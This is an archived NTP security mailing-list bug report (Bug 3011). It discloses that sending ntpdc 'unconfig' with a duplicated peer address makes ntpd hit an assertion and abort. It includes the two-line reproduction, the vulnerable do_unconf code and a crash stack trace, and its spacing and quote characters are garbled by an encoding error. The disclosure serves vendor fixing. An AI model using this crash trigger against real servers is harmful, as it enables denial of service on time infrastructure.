[ntp:security] [Bug 3011] Duplicate IPs on unconfig directives will cause an assertion botch

bugzilla-daemon at ntp.org bugzilla-daemon at ntp.org
Wed Feb 3 09:19:20 UTC 2016


http://bugs.ntp.org/show_bug.cgi?id=3011

Harlan Stenn <stenn at ntp.org> changed:

           What    |Removed                     |Added
----------------------------------------------------------------------------
              Group|                            |Security
                 CC|                            |LRlian at 163.com
            Summary|x                           |Duplicate IPs on unconfig
                   |                            |directives will cause an
                   |                            |assertion botch
              Flags|                            |blocking4.2.8+

--- Comment #1 from Harlan Stenn <stenn at ntp.org> 2016-02-03 09:19:20 UTC ---
================ target environment ================= 
聽 
ntp-4.2.8p6 and lower 
聽 
======================= test commands ======================= 
聽 
When I use these commands: 
聽 
ntpdc> addpeer 1.1.1.1 
Keyid: 8 
MD5 Password: 
done! 
聽 
ntpdc> unconfig 1.1.1.1 1.1.1.1 
192.168.1.111: timed out, nothing received 
***Request timed out 
聽 
The key point is that the command unconfig must have same two peeraddrs. My
test peeraddr is 1.1.1.1 
聽 
======================== vulnerable codes ======================== 
Ntp_request.c: 
聽 
do_unconf() 
{ 
聽聽聽聽聽聽聽聽 鈥� 
聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 found = FALSE; 
聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 p = NULL; 
聽 
聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 while (!found) { 
聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 p = findexistingpeer(&peeraddr, NULL, p, -1, 0);聽聽聽 
聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 if (NULL == p) 
聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 break; 
聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 if (FLAG_CONFIG & p->flags) 
聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 found = TRUE; 
聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 } 
聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 INSIST(found);聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 // !!!!!!!!!!! 
// If 鈥渇ound鈥� is FALSE, INSIST will call isc_assertion_failed() and abort()
,and ntp server will be crash . 
聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 //
If 鈥渦nconfig鈥� two same peeraddrs ,鈥漟ound鈥� will be FALSE on second loop.
聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 //
So if I 鈥渦nconfig鈥� two same peeraddrs, ntp server will be crash. 
聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 INSIST(NULL != p); 
聽 
聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 peer_clear(p, "GONE"); 
聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 unpeer(p);聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 // !!!!!! 
聽聽聽聽聽聽聽聽 鈥� 
} 
聽 
======================== call stacks ======================= 
#0聽 0x00007ffff66b65f7 in __GI_raise (sig=sig at entry=6) at
../nptl/sysdeps/unix/sysv/linux/raise.c:56 
#1聽 0x00007ffff66b7ce8 in __GI_abort () at abort.c:90 
#2聽 0x000000000057ba29 in assertion_failed (file=0x960660 <.str.25>
"ntp_request.c", line=1494, type=isc_assertiontype_insist, cond=0x9606a0
<.str.26> "found") at ntpd.c:1443
#3聽 0x000000000084d4da in isc_assertion_failed (file=0x960660 <.str.25>
"ntp_request.c", line=1494, type=isc_assertiontype_insist, cond=0x9606a0
<.str.26> "found") at ./../lib/isc/assertions.c:57
#4聽 0x000000000068dfa8 in do_unconf (srcadr=0x61d000018688,
inter=0x611000009640, inpkt=0x61d0000186ec) at ntp_request.c:1494
#5聽 0x000000000067a74d in process_private (rbufp=0x61d000018680, mod_okay=1) at
ntp_request.c:669 
#6聽 0x000000000063c162 in receive (rbufp=0x61d000018680) at ntp_proto.c:496 
#7聽 0x000000000057b689 in ntpdmain (argc=0, argv=0x7fffffffe150) at ntpd.c:1270 
#8聽 0x0000000000574818 in main (argc=3, argv=0x7fffffffe138) at ntpd.c:353 
聽 
Hope this email could help you! 
聽 
Best regards! 聽聽聽聽聽聽聽聽

-- 
Configure bugmail: http://bugs.ntp.org/userprefs.cgi?tab=email
------- You are receiving this mail because: -------
You are on the CC list for the bug.


More information about the security mailing list